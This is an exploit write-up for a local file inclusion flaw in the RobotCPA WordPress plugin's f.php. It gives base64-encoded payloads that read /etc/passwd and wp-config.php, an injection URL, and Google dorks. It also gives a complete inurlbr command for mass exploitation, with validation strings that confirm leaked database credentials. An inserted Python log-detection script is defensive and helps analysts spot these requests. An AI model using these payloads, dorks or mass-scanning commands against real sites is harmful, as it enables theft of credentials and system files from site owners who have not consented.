WordPress Plugin RobotCPA V5 – LFI Exploit

WordPress-Vulnerability
Exploit Title: WordPress Plugin RobotCPA V5 – Local File Include
Exploit Author: T3N38R15
Vendor Homepage: http://robot-cpa.good-info.co/
Version: 5V
Tested on: Windows (Firefox) / Linux (Firefox)
Access: https://www.exploit-db.com/exploits/37252/

The affected file is f.php, and its GET parameter "l" is vulnerable to local file inclusion.
The injected path only needs to be base64-encoded.

POC:

string exploit:
php://filter/resource=./../../../wp-config.php
base64:
cGhwOi8vZmlsdGVyL3Jlc291cmNlPS4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==

string exploit:
file:///etc/passwd
base64:
ZmlsZTovLy9ldGMvcGFzc3dk

Example injection:
http://domain.com/wp-content/plugins/robotcpa/f.php?l={STRING_BASE64_XPL}
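Since the injected path travels base64-encoded, a plain search of access logs for "../" or "/etc/passwd" misses these requests. The following Python is an added detection example, not part of the original advisory or of inurlbr: it decodes the "l" parameter of robotcpa/f.php requests from constructed common-log-format lines and flags values that name local files or PHP wrappers.

```python
import base64
import re
from urllib.parse import unquote, urlsplit

# Decoded values that point at server files or PHP wrappers instead of a redirect URL.
LFI_MARKERS = ("file://", "php://", "../", "/etc/", "wp-config.php")
# Common log format: ip ident user [timestamp] "METHOD path PROTO" status ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) \S+" \d{3}')

# Constructed sample lines (not from the original post): the advisory's two payloads,
# a harmless redirect target, and an unrelated request.
BENIGN = base64.b64encode(b"https://example.com/offer").decode()
SAMPLE_LOG = f"""\
203.0.113.5 - - [23/Jun/2015:13:47:40 +0000] "GET /wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk HTTP/1.1" 200 1834
203.0.113.5 - - [23/Jun/2015:13:47:41 +0000] "GET /wp-content/plugins/robotcpa/f.php?l=cGhwOi8vZmlsdGVyL3Jlc291cmNlPS4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA%3D%3D HTTP/1.1" 200 3102
198.51.100.7 - - [23/Jun/2015:13:50:02 +0000] "GET /wp-content/plugins/robotcpa/f.php?l={BENIGN} HTTP/1.1" 302 0
198.51.100.8 - - [23/Jun/2015:13:51:10 +0000] "GET /index.php?p=1 HTTP/1.1" 200 5000
"""

def get_param(query, name):
    """Percent-decode one query value by hand so a '+' inside base64 is not turned into a space."""
    for pair in query.split("&"):
        key, _, val = pair.partition("=")
        if key == name:
            return unquote(val)
    return None

def decode_param(value):
    """Base64-decode to text; None when the value is not valid base64 / UTF-8."""
    try:
        return base64.b64decode(value, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None

def classify(line):
    """Return (ip, decoded_l, markers_hit) for a robotcpa/f.php request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("path"))
    if not parts.path.endswith("/plugins/robotcpa/f.php"):
        return None
    decoded = decode_param(get_param(parts.query, "l") or "")
    hits = [mk for mk in LFI_MARKERS if decoded and mk in decoded]
    return m.group("ip"), decoded, hits

def find_lfi_attempts(log_text):
    """Return [(ip, decoded_value)] for every request whose decoded 'l' hits an LFI marker."""
    results = filter(None, (classify(line) for line in log_text.splitlines()))
    return [(ip, dec) for ip, dec, hits in results if hits]
```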

Mass exploitation with inurlbr,
using the --exploit-get parameter and the scanner's internal encoder

Example:
--exploit-get {you_get}
--exploit-get "&index.php?id=10'´0x27"

base64: encodes the given value in base64.
Example: base64({value})
Usage:   base64(102030)
Usage:   --exploit-get "user?id=base64(102030)"

Let's use:
--exploit-get "&l=base64(file:///etc/passwd)"
or
--exploit-get "&l=base64(php://filter/resource=./../../../wp-config.php)"

Dork:
inurl:"/wp-content/plugins/robotcpa/"
inurl:"plugins/robotcpa/f.php?l="

Complete command:
php inurlbr.php --dork 'inurl:"plugins/robotcpa/f.php?l="' --exploit-get "&l=base64(file:///etc/passwd)" -s vuln.txt -q 1,2,3,64

Internal validation script inurlbr

Exploring the server password file…

LOCAL FILE INCLUSION
Local File Inclusion (also known as LFI) is the process of including files that are already present locally on the server, by exploiting vulnerable inclusion procedures implemented in the application.
https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion
$validation['LOCAL-FILE-INCLUSION-01'] = '/root:/';
$validation['LOCAL-FILE-INCLUSION-02'] = 'root:x:0:0:';
$validation['LOCAL-FILE-INCLUSION-03'] = 'mysql:x:';
If any of these values is found in the response, the script flags the target as vulnerable.
Exploring the server wp-config.php file…

CMS WORDPRESS
As the name suggests, if the web application doesn't check the file name requested by the user, any malicious user can exploit this vulnerability to download sensitive files from the server.
Arbitrary file download vulnerability, target file wp-config.php
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271
http://www.acunetix.com/vulnerabilities/web/wordpress-plugin-slider-revolution-arbitrary-file-disclosure
$validation['CMS-WORDPRESS-01'] = "define('DB_NAME'";
$validation['CMS-WORDPRESS-02'] = "define('DB_USER'";
$validation['CMS-WORDPRESS-03'] = "define('DB_PASSWORD'";
$validation['CMS-WORDPRESS-04'] = "define('DB_HOST'";
If any of these values is found in the response, the script flags the target as vulnerable.

[Screenshot from 2015-06-23 13:47:40]

Download:
http://github.com/googleinurl/SCANNER-INURLBR
